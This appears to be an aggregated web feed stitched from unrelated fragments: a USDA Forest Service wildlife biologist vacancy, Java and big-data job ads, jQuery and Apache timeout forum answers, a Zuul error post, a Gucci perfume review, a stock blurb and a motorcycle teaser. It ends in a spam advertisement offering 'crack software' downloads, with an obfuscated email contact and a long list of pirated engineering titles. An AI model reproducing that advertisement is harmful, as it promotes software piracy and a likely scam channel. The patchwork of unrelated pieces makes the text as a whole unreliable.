level is defined as: * assisting with the collection of field data on wildlife habitats and vegetation; * interpreting aerial photos to determine vegetation types; * assembling biological and vegetation use data from records to determine past wildlife and livestock use; * assisting with the classification and evaluation of vegetation and soil to determine suitable habitats and ranges for wildlife. 
**GS-09:** In addition to the requirements described above, the following education and/or experience are required for the GS-09 level: One year or more of specialized experience equivalent to at least the GS-07 grade level; **OR** Master's or equivalent graduate degree or 2 full years of progressively higher level graduate education leading to such a degree; **OR** An appropriate combination of specialized experience and education (only graduate education in excess of 18 semester hours may be used to qualify applicants for this grade level). The education must have been obtained in an accredited college or university and demonstrate the knowledge, skills, and abilities necessary to do the work. Specialized experience at the GS-07 level is defined as: * performing qualitative and quantitative analyses of wildlife resources; * conducting surveys and drafting tentative professional opinions to assist in determining wildlife resource needs and remedies; * assisting in carrying out a range of analytical/scientific assignments in the wildlife biology profession that included researching and analyzing data, issues, and information that support wildlife project recommendations. To receive consideration for this position, you must meet all qualification requirements by the closing date of the announcement. **TIME IN GRADE REQUIREMENT**: If you are a current federal employee in the General Schedule (GS) pay plan and applying for a promotion opportunity, you must meet time-in-grade (TIG) requirements of 52 weeks of service at the next lower grade level in the normal line of progression for the position being filled. This requirement must be met by the closing date of this announcement. ### Education ### Additional information BACKGROUND INVESTIGATION AND FINGERPRINT CHECK: Selection and retention in this position is contingent on a successfully adjudicated FBI National Criminal History Check (fingerprint check) and a background investigation. 
Career Transition Assistance Plan (CTAP), Reemployment Priority List (RPL) or Interagency Career Transition Assistance Plan (ICTAP): To exercise selection priority for this vacancy, CTAP/RPL/ICTAP candidates must meet the basic eligibility requirements and all selective factors. CTAP/ICTAP candidates must be rated and determined to be well qualified (or above) based on an evaluation of the competencies listed in the How You Will Be Evaluated section. When assessed through a score-based category rating method, CTAP/ICTAP applicants must receive a rating of at least 85 out of a possible 100. Bargaining Unit Status: Eligible - Coverage is dependent upon unit location. Bargaining units are represented by NFFE-IAMAW or AFGE. Forest Service daycare facilities and government housing are not available. Direct Deposit - Per Public Law 104-134 all Federal employees are required to have federal payments made by direct deposit to a financial institution of their choosing. E-Verify: Federal law requires agencies to use the E-Verify system to confirm the employment eligibility of all new hires. If you are selected as a newly hired employee, the documentation you present for purposes of completing the Department of Homeland Security (DHS) Form I-9 on your entry-on-duty date will be verified through the DHS E-VERIFY system. Under the system, the new hire is required to resolve any identified discrepancies as a condition of continued employment. Farm Service Agency (FSA) County Employees: Permanent County employees without prior Federal tenure who are selected for a Civil Service position under Public Law 105-277 will be given a career-conditional appointment and must serve a 1-year probationary period. The Land Management Workforce Flexibility Act (LMWFA) provides current or former temporary or term employees of federal land management agencies the opportunity to compete for permanent competitive service positions. 
Individuals must have more than 24 months of service without a break between appointments of two or more years. Service must be in the competitive service and have been at a successful level of performance or better. For more information on applying under special hiring authorities, explore the different Hiring Paths on the USAJOBS website. This position is eligible for telework and other flexible work arrangements. Veterans who are preference eligible or who have been separated from the armed forces under honorable conditions after three years or more of continuous active service are eligible for consideration under the Veterans Employment Opportunities Act (VEOA). Read more ### How You Will Be Evaluated You will be evaluated for this job based on how well you meet the qualifications above. You will be evaluated based on your qualifications for this position as evidenced by the experience, education, and training you described in your application package, as well as the responses to the Assessment Questionnaire, to determine the degree to which you possess the knowledge, skills, abilities and competencies listed below. GS-5: * **Knowledge of wildlife biology to manage and evaluate wildlife resources studies, investigations, or projects.** * **Ability to communicate effectively in writing.** * **Ability to communicate effectively other than in writing.** GS-7: * **Knowledge of wildlife biology to manage and evaluate wildlife resources studies, investigations, or projects.** * **Ability to analyze wildlife management issues and problems.** * **Ability to communicate effectively in writing.** * **Ability to communicate effectively other than in writing.** GS-9: * **Knowledge of wildlife biology to manage and evaluate wildlife resources studies, investigations, or projects.** * **Ability to analyze wildlife management issues and problems.** * **Ability to perform program management and oversight functions related to the wildlife resource.** * **Ability to communicate effectively 
in writing.** * **Ability to communicate effectively other than in writing.** Note: If, after reviewing your resume and/or supporting documentation, a determination is made that you have inflated your qualifications and/or experience, your rating may be lowered to more accurately reflect the submitted documentation. Please follow all instructions carefully. Errors or omissions may affect your rating. Providing inaccurate information on Federal documents could be grounds for non-selection or disciplinary action, up to and including removal from the Federal service. Clicking the link below will present a preview of the application form; i.e., the online questionnaire. The application form link below will only provide a preview and does not initiate the application process. To initiate the online application process, click the "Apply" button to the right. Your application, including the online Assessment Questionnaire, will be reviewed to determine (a) if you meet minimum qualification requirements and (b) if your resume supports the answers provided to the job-specific questions. Your resume must clearly support your responses to all the questions addressing experience and education relevant to this position. Applicants who meet the minimum qualification requirements and are determined to be among the best qualified candidates will be referred to the hiring manager for consideration. Noncompetitive candidates and applicants under some special hiring authorities need to meet minimum qualifications to be referred. To view the application form, visit: https://fs.usda.ntis.gov/cp/?event=jobs.previewApplication&jobid=33F734A1-8975-41D4-B405-A93400EDDF6A Read more ### Background checks and security clearance ##### Security clearance Not Applicable * Required Documents Help ## Required Documents The following documents are required for your applicant package to be complete. 
Our office cannot be responsible for incompatible software, illegible fax transmissions, delays in the mail service, your system failure, etc. Encrypted documents will not be accepted. Failure to submit required, legible documents may result in loss of consideration. * Resume that includes: 1) personal information such as name, address, contact information; 2) education; 3) detailed work experience related to this position as described in the major duties including work schedule, hours worked per week, dates of employment; title, series, grade (if applicable); 4) supervisor’s phone number and whether or not the supervisor may be contacted for a reference check; 5) other qualifications. * If education is required or you are using education to qualify, you must submit: a copy of your college transcripts. An unofficial copy is sufficient with the application; however, if you are selected, you will be required to submit official transcripts prior to entering on duty. Education must have been successfully obtained from an accredited school, college or university. If any education was completed at a foreign institute, you must submit with your application evidence that the institute was appropriately accredited by an accrediting body recognized by the U.S. Department of Education as equivalent to U.S. education standards. There are private organizations that specialize in this evaluation and a fee is normally associated with this service. All transcripts must be in English or include an English translation. 
In addition to the above, you must submit the documents below if you claim any of the following: * Current Federal employees: 1) Most recent non-award Notification of Personnel Action (SF-50) showing that you are/were in the competitive service, highest grade (or promotion potential) held on a permanent basis, position title, series and grade **AND** 2) Most recent performance appraisal (dated within 18 months) showing the official rating of record, signed by a supervisor, or statement why the performance appraisal is unavailable. Do not submit a performance plan. * Surplus or displaced employees eligible for CTAP, RPL, or ICTAP priority: proof of eligibility (RIF separation notice, notice of proposed removal for declining a transfer of function or directed reassignment to another commuting area, notice of disability annuity termination), SF-50 documenting separation (as applicable), and your most recent SF-50 noting position, grade level, and duty location with your application per 5 CFR 330. * Land Management Workforce Flexibility Act Eligible Applicants: Notification of Personnel Actions (SF-50s) showing you have served in appropriate appointment(s) for a period/periods that total more than 24 months without a break in service of two or more years. You must include the initial hire actions, extensions, conversions and termination/separation SF-50s for each period of work; **AND** Performance Rating(s) or other evidence showing acceptable performance for ALL periods counted toward the more than 24 months of service. 
You must provide: 1) Performance Rating(s) showing an acceptable level of performance for period(s) of employment counted towards your eligibility, signed by your supervisor(s); or 2) If documentation of a rating does not exist for one or more periods, a statement from your supervisor(s) or other individual in the chain of command indicating an acceptable level of performance for the period(s) of employment counted towards your eligibility; or 3) If you do not have a Performance Rating or other performance documentation (outlined in 1 and 2 above) for any period that you are using to qualify for eligibility under the LMWFA, you must provide: A stated reason as to why the appraisal/documentation is not available, and a statement that your performance for all periods was at an acceptable level, your most recent separation was for reasons other than misconduct or performance, and you were never notified that you were not eligible for rehire based on performance. (This shall be accepted in lieu of providing copies of the performance appraisals). * Current permanent FSA County employees: most recent non-award Notification of Personnel Action (SF-50 or equivalent) showing your highest grade (or promotion potential) held on a permanent basis, position title, series and grade AND most recent performance appraisal (dated within 18 months) per above. * VEOA, VRA and 30% Disabled Veterans: please review the Required Documents for Hiring Authorities Quick Guide on the Forest Service website. * If claiming eligibility under a special hiring authority not listed above, please review the Required Documents for Hiring Authorities Quick Guide on the Forest Service website. #### If you are relying on your education to meet qualification requirements: Education must be accredited by an accrediting institution recognized by the U.S. Department of Education in order for it to be credited towards qualifications. 
Therefore, provide only the attendance and/or degrees from schools accredited by accrediting institutions recognized by the U.S. Department of Education. Failure to provide all of the required information as stated in this vacancy announcement may result in an ineligible rating or may affect the overall rating. * Benefits Help ## Benefits A career with the U.S. Government provides employees with a comprehensive benefits package. As a federal employee, you and your family will have access to a range of benefits that are designed to make your federal career very rewarding. Learn more about federal benefits. Eligibility for benefits depends on the type of position you hold and whether your position is full-time, part-time, or intermittent. Contact the hiring agency for more information on the specific benefits offered. * How to Apply Help ## How to Apply Please view Tips for Applicants, a guide to the Forest Service application process. Please read the entire announcement and all instructions before you begin. You must complete this application process and submit all required documents electronically by 11:59 p.m. Eastern Time (ET) on the closing date of this announcement. Applying online is highly encouraged. We are available to assist you during business hours (normally 8:00 a.m. - 4:00 p.m., Monday - Friday). If applying online poses a hardship, contact the Agency Contact listed below well before the closing date for an alternate method. All hardship application packages must be complete and submitted no later than noon ET on the closing date of the announcement in order to be entered into the system prior to its closing. This agency provides reasonable accommodation to applicants with disabilities on a case-by-case basis; contact the Agency Contact to request this. To begin, click "Apply Online" and follow the instructions to complete the Assessment Questionnaire and attach your resume and all required documents. 
**NOTE:** You must verify that uploaded documents from USAJOBS transfer into the Agency's staffing system. Applicants may combine all like required documents (e.g., all SF-50s) into one or more files and scan for uploading into the application. Each file must not exceed 3MB. Grouping like documents into files will simplify the application process. Documents must be in one of the following formats: GIF, JPEG, JPG, PDF, PNG, RTF, or Word (DOC or DOCX). Uploaded documents may not require a password, digital signature, or other encryption to open. Read more ### Agency contact information ### HRM Contact Center ##### Phone 877-372-7248, option 2 ##### TDD 800-877-8339 ##### Fax 877-339-0719 ##### Email fsjobs@fs.fed.us ##### Address USDA Forest Service Do not mail applications, see instructions under How to Apply tab. Albuquerque, NM, 87109 United States Learn more about this agency ### Next steps Your application will be reviewed to verify that you meet the eligibility and qualification requirements for the position prior to issuing referral lists to the selecting official. If further evaluation or interviews are required, you will be contacted. Log in to your USAJOBS account to check your application status. We expect to make a final job offer approximately 40 days after the deadline for applications. Multiple positions may be filled from this announcement. Read more * Fair & Transparent ## Fair & Transparent The Federal hiring process is set up to be fair and transparent. Please read the following guidance. ### Equal Employment Opportunity Policy The United States Government does not discriminate in employment on the basis of race, color, religion, sex (including pregnancy and gender identity), national origin, political affiliation, sexual orientation, marital status, disability, genetic information, age, membership in an employee organization, retaliation, parental status, military service, or other non-merit factor. 
* Equal Employment Opportunity (EEO) for federal employees & job applicants Read more ### Reasonable Accommodation Policy Federal agencies must provide reasonable accommodation to applicants with disabilities where appropriate. Applicants requiring reasonable accommodation for any part of the application process should follow the instructions in the job opportunity announcement. For any part of the remaining hiring process, applicants should contact the hiring agency directly. Determinations on requests for reasonable accommodation will be made on a case-by-case basis. A reasonable accommodation is any change to a job, the work environment, or the way things are usually done that enables an individual with a disability to apply for a job, perform job duties or receive equal access to job benefits. Under the Rehabilitation Act of 1973, federal agencies must provide reasonable accommodations when: * An applicant with a disability needs an accommodation to have an equal opportunity to apply for a job. * An employee with a disability needs an accommodation to perform the essential job duties or to gain access to the workplace. * An employee with a disability needs an accommodation to receive equal access to benefits, such as details, training, and office-sponsored events. You can request a reasonable accommodation at any time during the application or hiring process or while on the job. Requests are considered on a case-by-case basis. Learn more about disability employment and reasonable accommodations or how to contact an agency. Read more #### Legal and regulatory guidance * Financial suitability * Social security number request * Privacy Act * Signature and false statements * Selective Service * New employee probationary period This job originated on www.usajobs.gov. For the full announcement and to apply, visit www.usajobs.gov/GetJob/ViewDetails/507189800. 
Only resumes submitted according to the instructions on the job announcement listed at www.usajobs.gov will be considered. *Open & closing dates:* 08/06/2018 to 08/20/2018 *Salary:* $33,394 to $65,778 per year *Pay scale & grade:* GS 05 - 09 *Work schedule:* Full-Time *Appointment type:* Permanent
          Bearish Moving Average Cross by Apache Corp (APA)
Today, shares of Apache Corp (NYSE:APA) have fallen below their 10-day MA of $45.25 on a volume of 2.5 million shares. This may provide swing traders with an opportunity...
          Junior Java Developer
Technical Skills: The ideal candidate is expected to be technically strong in the following general areas:
* Core Java
* UNIX/Linux (command line and shell scripting)
* Continuous Integration with Jenkins or similar
* Good written and verbal communication

The following technologies and activities represent the EPP settlement stack; experience in some or all may be an advantage, and use of any or all of these technologies may be required over time:
* REST APIs, JSON
* Spring (core, integration, boot, batch and other libraries)
* Messaging middleware (RabbitMQ)
* Hadoop stack (HBase, Storm)
* Apache Kafka, Apache HDFS, Apache Spark, Apache Parquet & Avro
* ZooKeeper, YARN
* Pivotal Cloud Foundry, AWS development
* JBoss Drools
* Working in Agile projects, Test-Driven Development
* Secure coding practices
* Git/GitHub, Gradle

Responsibilities:
* Application development and software engineering as part of an Agile scrum team
* Provide specialised expertise and applied knowledge on aspects of EPP settlement application development
* Work with tech leads to understand architecture direction and contribute to the creation of high-level designs
* Develop proofs of concept and critical software application components
* Collaborate with business partners to review requirements (agile features)
* Follow Agile and Scaled Agile software development methodologies
* Software development estimation
* QA team collaboration
* Software application third-line production support

Requirements:
* Bachelor's degree
* Preferred: 2 years software development experience
* Must possess the judgement to plan and accomplish goals with minimal supervision

This position will require the candidate to perform a wide variety of tasks. A wide degree of creativity and flexibility with regard to technology is expected. This is for a large financial company; for more information or to apply, please get in touch.
          Associate Java Developer
Responsibilities:
* Working in an Agile environment following SAFe and Continuous Integration/Deployment practices
* Develop and maintain applications for the eWallets Program:
  * RESTful API based applications (Java, Spring)
  * Batch applications (Spring Batch)
  * GUI applications (JSF, Spring)
* Interpreting and refining system and functional requirements
* Writing technical design documentation (high and low level) as required
* Estimation of development effort
* Coding of the applications following quality processes, including code reviews, SonarQube standards, and writing unit tests (JUnit, mocks), SIT tests, and end-to-end tests as appropriate
* Working with the eWallets QA group to ensure that the code meets the functional test requirements
* Working with the eWallets QA group to perform load, performance and destructive testing
* Writing and executing production and pre-production implementation plans
* Providing level 3 production support for eWallets applications, including out-of-hours support on a rota basis
* Providing guidance and help to other team members

Requirements:
* Bachelor's degree or equivalent experience
* Minimum of 5 years software development experience
* Has been involved in and implemented business-critical projects of large scope and technical complexity
* Ability to prepare and communicate high-level application designs and concepts to management and peers
* Must possess the judgement to plan and accomplish goals with minimal supervision
* This position will require the candidate to perform a wide variety of tasks; a wide degree of creativity and flexibility with regard to technology is expected
Expected to be strong in the following general areas:
* Enterprise software development
* Java SE, EE, REST APIs, TDD

Experience with the following is an advantage:
* Design patterns
* Financial Services
* Payments Industry and/or PCI compliance
* SAFe, Agile methodology, Scrum
* Continuous Integration/Delivery, Jenkins
* Spring, Hibernate, JPA
* Messaging: JMS, WMQ, SEDA, Rabbit
* JSF, PrimeFaces, HTML, Ajax
* WebSphere Application Server, Tomcat
* Oracle RDBMS
* Apache Camel, Spring Integration
* Unix/Linux, shell scripting
* TCP/IP, Java NIO
* Cloud: PCF

For the company profile, or if the role looks of interest, please apply.
          Re : can jquery support a menu sending files to 3 different DIVs on the same page
Well, I see one "wrong tree".

frames -> flexbox

Frames let you load different HTML documents into different "windows" on the same browser window/tab. Each frame acts like it is a separate browser tab/window. That is, you load complete HTML documents into each one, and they operate independently, each with their own scripts and CSS.

Flexbox is a detail of CSS layout. It helps you lay out nice self-adjusting boxes.

You should be thinking frames -> Ajax.

Ajax lets you load content into different parts of your document.

You can use Ajax with or without Flexbox. One has nothing to do with the other.

    https://learn.jquery.com/ajax/

P.S. Normally, with Ajax, you will load HTML FRAGMENTS into parts of your document using Ajax. Not entire documents. (They should not have <head>, scripts, etc.)

As a KLUDGE, you can remove the parts that aren't needed (and that will cause trouble!) before inserting the HTML into parts of your document.
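In fact, jQuery's `.load()` already supports this: when the URL string contains a space followed by a selector (`"url #fragment"`), jQuery fetches the page and inserts only the matching element, discarding `<head>`, scripts, etc. A minimal sketch for a menu driving three divs (the file names, ids, and `#content` fragment id here are made up for illustration):

```javascript
// Hypothetical markup (assumed, not from the original question):
//   <a href="#" class="menu-link" data-target="#top"    data-page="intro.html">Intro</a>
//   <a href="#" class="menu-link" data-target="#middle" data-page="news.html">News</a>
//   <a href="#" class="menu-link" data-target="#bottom" data-page="faq.html">FAQ</a>
//   <div id="top"></div> <div id="middle"></div> <div id="bottom"></div>

// Build the argument for jQuery's .load(). The "url #fragment" form tells
// jQuery to fetch the whole page but insert only the element matching
// #fragment -- no manual stripping of <head> or scripts needed.
function loadArg(page, fragmentSelector) {
  return fragmentSelector ? page + " " + fragmentSelector : page;
}

// Browser wiring (needs jQuery; guarded so the helper above stands alone):
if (typeof $ !== "undefined") {
  $(document).on("click", ".menu-link", function (e) {
    e.preventDefault();
    var $link = $(this);
    // e.g. $("#middle").load("news.html #content")
    $($link.data("target")).load(loadArg($link.data("page"), "#content"));
  });
}
```

Each menu link names its own target div, so one delegated click handler serves all three panes.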

Do you use a server? Or do you just load files from your local filesystem? You should use a server, even if it's just one running on your desktop system. You will have problems implementing Ajax without a server. It does not have to be a fancy server - e.g. you do not need a fancy Apache server. 

P.P.S. If you are going to go gung-ho flexbox (and I think it's a good idea!) you should take a look at Bootstrap 4. It's a modern CSS (and Javascript) framework "lite" that uses flexbox and typographic (rather than pixel) sizing. You wouldn't have to write all that flexbox CSS. It has CSS classes that control all of the flex options, and it will take care of the browser differences for you. (You don't need to write -webkit-flex, -moz-flex, etc.)

https://getbootstrap.com/docs/4.1/getting-started/introduction/

I'll message you privately. I develop a very targeted piece of educational software (as an App). I use Bootstrap 4, Ajax, and Flexbox.

          Me trying to watch TV #kitten #cat #catsofinstagram #beautiful #love #pet #photooftheday #likemypet #kitty #feline #yourcatstoday #showcasingpets #petstagram #catlady #catlove #SiameseCat #seallynxpoint

okieapache70 posted a photo:



          Errors when load-testing a microservice interface
Main error messages: com.netflix.zuul.exception.ZuulException: Filter threw Exception   Caused by: java.lang.reflect.UndeclaredThrowableException: null Caused by: org.apache.catalina.connector.ClientAbortException: java.io.IOException: An established connection was aborted by the software in your host machine. Spring Boot is started from the jar package...
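A note on one common cause (an assumption, since the post shows no configuration): under load, `ClientAbortException` typically means the caller, either the load-testing tool or Zuul itself, timed out and closed its side of the socket before the response was written. If the gateway timeouts are still at their defaults, raising them is the usual first step. A hedged sketch of the relevant Spring Cloud Netflix properties (values are illustrative, not recommendations):

```yaml
# Illustrative only -- tune to your own latency profile.
# Routes forwarded by URL (zuul.routes.*.url) use these:
zuul:
  host:
    connect-timeout-millis: 5000
    socket-timeout-millis: 30000

# Routes resolved by service ID go through Ribbon instead:
ribbon:
  ConnectTimeout: 5000
  ReadTimeout: 30000

# The Hystrix command wrapping each route must outlive Ribbon's timeout:
hystrix:
  command:
    default:
      execution:
        isolation:
          thread:
            timeoutInMilliseconds: 35000
```

If these are already generous, also check the load tool's own response timeout and the backing service's thread pool and connection limits.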
          GUCCI, Bloom Acqua di Fiori
In summer, seeking respite from heavier compositions, we reach for lighter scents. I have a few holiday favourites of my own; Gucci Bloom Acqua di Fiori is a very green proposition with a light dose of powderiness.



Gucci is one of the largest fashion houses in the world, founded in 1921 in Florence, Italy. The brand is known for its creativity, innovation and unrivalled Italian craftsmanship. In 1970 it entered the world of fragrance, combining tradition and modernity to create sensual, refined and tempting compositions. The best known include the timeless and sensual Eau De Parfum II, the girlish and energetic Rush 2, and the so very sensual Gucci Envy Me. More subtle yet expressive floral compositions can be found in the Flora collection. The first Gucci fragrance under the name Bloom was created in 2017, a return to the Italian art of perfumery and to natural flowers. Described as "elissir di fiore", a floral essence full of finesse, it was awarded the title of best fragrance in the ELLE INTERNATIONAL BEAUTY AWARDS 2018, organised across 46 countries worldwide. Acqua di Fiori is its green variation.
 
The new edition of Gucci Bloom is the fruit of a collaboration between Alessandro Michele and master perfumer Alberto Morillas. You could say the two gentlemen refreshed the classic in favour of green tones. Floral notes and intensely concentrated ingredients are still present here. Recalling the varied aromas of a garden in bloom, they perfectly complement the base, which is built on sandalwood and musk to radiate warmth and depth. The fragrance opens very green, downright refreshing; a new juicy accord, intensely fresh and composed of green galbanum and delicate blackcurrant buds, invites us for a walk through the garden. After a moment, the musky tones of galbanum leaves soften the piquancy of the currant buds. In the heart you can already sense a bouquet of flowers: the jasmine buds characteristic of Gucci Bloom emerge, not too heavy, as if fluttering in the wind, along with Rangoon creeper and tuberose. A beautiful bouquet whose sensual depth is defined by the scent of musk and sandalwood, warm and deep in character. The fragrance is refreshing, just right for spring or the height of summer, light and pleasant yet expressive. This game of green is no grassy turf, nor a lush flowery wreath. It is a unique blend with a strong message, and long-lasting. The scent seems made for spontaneous, joyful, lively women full of girlish charm.


 

The bottle and packaging echo Gucci Bloom: kept in beige tones, they are set apart by an eccentric floral herbarium ornament in a new green shade. A pattern of leaves, cherry twigs and flowers in the style of toile de Jouy (a fabric decorated with idyllic genre scenes) is framed in black. The green colour reflects the fragrance notes and the scent's message of energy and freshness. The Gucci Bloom Acqua di Fiori advertising campaign affirms vitality and youthful energy. The film was directed by Glen Luchford. It shows the relationship between friends of the House of Gucci, Dakota Johnson, Hari Nef and Petra Collins, as they talk about their special bond. The girls revel in the beauty and lushness of nature, swimming at dusk in a shimmering lake overgrown with flowers and rushes, surrounded by a green, fragrant cascade.

"Bonds are born spontaneously, filled with youthful joy, and female friendships quickly become unbreakable, able to stand the test of time. The new chapter in the story of the Gucci Bloom brand tells of these true relationships. The new fragrance, Gucci Bloom Acqua di Fiori, affirms vitality and the energy of youth and friendship. A fresh and green new incarnation of a well-known scent, it is a radiant and uplifting composition, a fragrance that reveals the beauty of unselfconscious innocence."


Although Gucci Bloom Acqua di Fiori retains Bloom's floral accord, it is nevertheless a distinct and original fragrance. It comes across as fresh and bright green, but what won me over is the pinch of musk, which I adore.

                                           GUCCI, Bloom Acqua di Fiori 50 ml – 349 zł 
                                           GUCCI, Bloom Acqua di Fiori 100 ml – 465 zł
 

          Software Developer Search Algorithms *      Cache   Translate Page   Web Page Cache   

Software Developer Search Algorithms * Time to reboot? We are looking for enthusiastic team players who enjoy taking on responsibility and who take bold and thoughtful decisions. People who jump in at the deep end with passion. With over 1,500 employees and 5 million customers, the myToys Group is one of the most successful e-commerce companies in Germany and is part of the Otto Group. As a Software Developer Search Algorithms * you are involved in the development of our e-commerce platform and the optimization of our search engine. You develop new components for text search and suggestion functions, as well as analytics and optimization tools. You are passionate about search technologies and you have fun trying new things, such as machine learning or new search engines. In cooperation with our product owner and search team, you will make a significant contribution to the success of our shop development. Scrum is not just a slogan for us, but a living reality. Our team plans and organizes its work autonomously. The Scrum Master and team leader see themselves as supporters and enablers of team requirements. We are currently in the process of setting up guilds in which our developers deal with cross-team topics such as architecture, code quality, testing and continuing professional development.
Job requirements: A successfully completed Bachelor's degree in Software Engineering or a similar discipline; sound knowledge of Java (preferably the latest version) with several years of experience; in-depth knowledge of Apache Solr or similar technologies; knowledge of scripting languages; familiarity with search engines, text search and suggestion functions; good knowledge of relational and non-relational databases; familiarity with QA measures such as unit tests, pair programming, code reviews and TDD; a passion for "clean code" and quality standards; experience with modern software architectures and agile development structures; commitment, good communication skills and the ability to work in a team. We offer: an attractive, modern workplace in the heart of Berlin; a motivated team that welcomes innovation; exciting tasks and a great deal of personal responsibility; the daily opportunity to develop your own strengths; individual development opportunities, room for new ideas and flat hierarchies; Flexibl... Original job ad is published on StepStone.de - Set up a Jobagent at StepStone now and find your dream job! https://bit.ly/2KOagYD For similar jobs, information on employers and career tips visit StepStone.de!

    Company: myToys.de GmbH
    Employment type: Full-time

          Junior Software Engineer - Leidos - Morgantown, WV      Cache   Translate Page   Web Page Cache   
Familiarity with NoSQL databases (Apache Accumulo, MongoDB, etc.). Leidos has a job opening for a Junior Software Engineer in Morgantown, WV....
From Leidos - Wed, 25 Jul 2018 12:47:39 GMT - View all Morgantown, WV jobs
          TVS Apache RR310 Review – Versatility Meets Race Dynamics      Cache   Translate Page   Web Page Cache   

In 1987, TVS Racing came into existence with the objective of engineering motorcycles for high-performance racing. In 1994, TVS Racing became the first Indian manufacturer to launch one-make racing in the country. Today, with 35 years of racing, TVS has been an unstoppable force in the world of Indian motorsports, and the culmination of it […]

Read the full article: TVS Apache RR310 Review – Versatility Meets Race Dynamics


          Valick wrote in the thread: Long-running script execution      Cache   Translate Page   Web Page Cache   
Under HTTP 1.1, all connections are considered persistent unless declared otherwise.[1] Persistent connections do not use keepalive messages; they simply allow multiple requests to be sent over the same connection. However, the default timeout in Apache httpd is only 15 seconds for versions 1.3[2] and 2.0[3], and just 5 seconds for versions 2.2[4] and 2.4[5]. The advantage of a short timeout is that several components of a web page can be delivered to the client quickly without tying up server processes or threads in a waiting state for too long.[6]

In your case the simplest approach is to poll the server via AJAX to check whether the file is ready. I also suspect the file-generation algorithm itself is far from ideal, starting with the database fetch, which most likely runs queries in a loop.
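The polling pattern suggested above can be sketched in a server-agnostic way. This is a minimal Python illustration rather than the AJAX/PHP of the thread; the file path and intervals are hypothetical placeholders:

```python
import os
import time

def poll_until_ready(is_ready, interval=10.0, timeout=600.0):
    """Call is_ready() every `interval` seconds until it returns True
    or `timeout` seconds have elapsed. Returns True once ready,
    False if the deadline passes first."""
    deadline = time.monotonic() + timeout
    while True:
        if is_ready():
            return True
        if time.monotonic() >= deadline:
            return False
        time.sleep(interval)

# Example: "ready" means the generated file has appeared on disk.
# The path is a placeholder for whatever the generating script writes.
file_ready = poll_until_ready(lambda: os.path.exists("/tmp/report.csv"),
                              interval=0.05, timeout=0.2)
```

In a browser the same loop would be a JavaScript timer hitting a status endpoint; the structure (check, wait, re-check, give up after a deadline) is identical.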
          Apache Corp. On Pace Largest Percent Decrease Since March 2016...      Cache   Translate Page   Web Page Cache   

Apache Corporation (APA) is currently at $42.39, down $3.74 or 8.11%

 

-- Would be lowest close since June 15, 2018 when it closed at $41.61

-- On pace for largest percent decrease since March 8, 2016 when it fell 9.51%

-- Earlier Thursday, Stifel Nicolaus raised...

          XAMPP 7.2.8-0      Cache   Translate Page   Web Page Cache   
A very easy-to-install Apache distribution for Linux, Solaris, and Windows. 2018-08-09
          Hadoop Developer with Java - Allyis Inc. - Seattle, WA      Cache   Translate Page   Web Page Cache   
Working knowledge of big data technologies such as Apache Flink, Nifi, Spark, Presto, Elastic Search, DynamoDB and other relational data stores....
From Dice - Sat, 28 Jul 2018 03:49:51 GMT - View all Seattle, WA jobs
          Sr Software Engineer - Hadoop / Spark Big Data - Uber - Seattle, WA      Cache   Translate Page   Web Page Cache   
Under the hood experience with open source big data analytics projects such as Apache Hadoop (HDFS and YARN), Spark, Hive, Parquet, Knox, Sentry, Presto is a...
From Uber - Sun, 13 May 2018 06:08:42 GMT - View all Seattle, WA jobs
          Software Development Engineer - Big Data Platform - Amazon.com - Seattle, WA      Cache   Translate Page   Web Page Cache   
Experience with Big Data technology like Apache Hadoop, NoSQL, Presto, etc. Amazon Web Services is seeking an outstanding Software Development Engineer to join...
From Amazon.com - Wed, 08 Aug 2018 19:26:05 GMT - View all Seattle, WA jobs
          Sr. Technical Account Manager - Amazon.com - Seattle, WA      Cache   Translate Page   Web Page Cache   
You can also run other popular distributed frameworks such as Apache Spark, Apache Flink, and Presto in Amazon EMR;...
From Amazon.com - Wed, 01 Aug 2018 01:21:56 GMT - View all Seattle, WA jobs
          HRS Hampson Russe v10.3      Cache   Translate Page   Web Page Cache   

crack software download CATENA.SIMetrix-SIMPLIS.8.0 DATEM Summit Evolution v6.8 GLOBE Claritas v6.6 Kepware v6.4
ttmeps#gmail.com ----- change "#" to "@"
Anything you need,You can also check here: ctrl + f

AMI.Vlaero.Plus.v2.3.0.10
2S.I. PRO_SAP RY2015b v15.0.1
Aquaveo Surface-water Modeling System Premium v11.2.12 Win64
Aquaveo.GMS.Premium.v10.0.11.Win64
Ashampoo.3D.CAD.Pro.v5.0.0.1
3DCS Variation Analyst MultiCAD v7.2.2.0 Win32_64
3DCS Variation Analyst v7.3.0.0 for CATIA V5 Win32_64
AGI.Systems.Tool.Kit(STK).v10.1.3
ANSYS Customization Tools (ACT) 16.0-16.1 Suite
ANSYS Electromagnetics Suite 16.2 Win64
Ansys Products v16.2 Win64Linux64
Ashampoo.3D.CAD.Architecture.5.v5.5.0.02.1
Ashampoo.3D.CAD.Professional.5.v5.5.0.01
Avenza Geographic Imager v5.0.0 for Adobe CS5-CC2015 Win32_64
Avenza MAPublisher v9.6.0 for Adobe CS5-CC2015 Win32_64
AVEVA.PDMS.V12.1 SP1
B&K Pulse v19.1
LEAP.Bridge.Steel.V8i.SS2.01.02.00.01
STAAD.Foundation.Advanced.V8i.SS3.07.02.00.00
BioSolveIT.SeeSAR.v3.2
AutoPIPE Vessel V8i SS1 v33.03.01.07
HAMMER V8i v08.11.06.58
WaterCAD & WaterGEMS V8i SS6 08.11.06.58
Cadence Allegro and OrCAD (Including ADW) v17.00.005
CadSoft.Computer.EAGLE.Professional.v7.3.0 x32x64
Carlson.Civil.Suite.2016.150731.Win32_64
Carlson.Precision.3D.2015.31933
CD-Adapco Star CCM+ 10.04.011 Win64Linu64
ClearTerra LocateXT ArcGIS for Server Tool 1.2 Win32_64
ClearTerra LocateXT Desktop 1.2 Win32_64
ClearTerra.LocateXT.ArcGIS.for.Server.Tool.v1.2.Win32_64
ClearTerra.LocateXT.Desktop.v1.2.Win32_64
CST Studio Suite 2015 +SP4
CD-ADAPCO.STAR-CCM.10.04.011-R8(double precision).Win64.&.Linux64
CES EduPack v2015
Schlumberger InSitu Pro 2.0
easycopy v8.7.8
Chasm.Ventsim.Visual.Premium.v4.0.6.1.Win32_64
Command.Digital.AutoHook.2016.v1.0.1.20
Corel.Corporation.CorelCAD.2015.v2015.5.Win32_64
Concept GateVision v5.9.7 Win&Linux
Crosslight.Apsys.2010.Win
Cmost Studio v2014
Delcam PowerMILL2Vericut v2016 Win64
Delcam PowerSHAPE 2016 Win64
DICAD.Strakon.Premium.v2015
DownStream Products v2015.6
DownStream Products v2015.8
DeskArtes.3Data.Expert.v10.2.1.7 x32x64
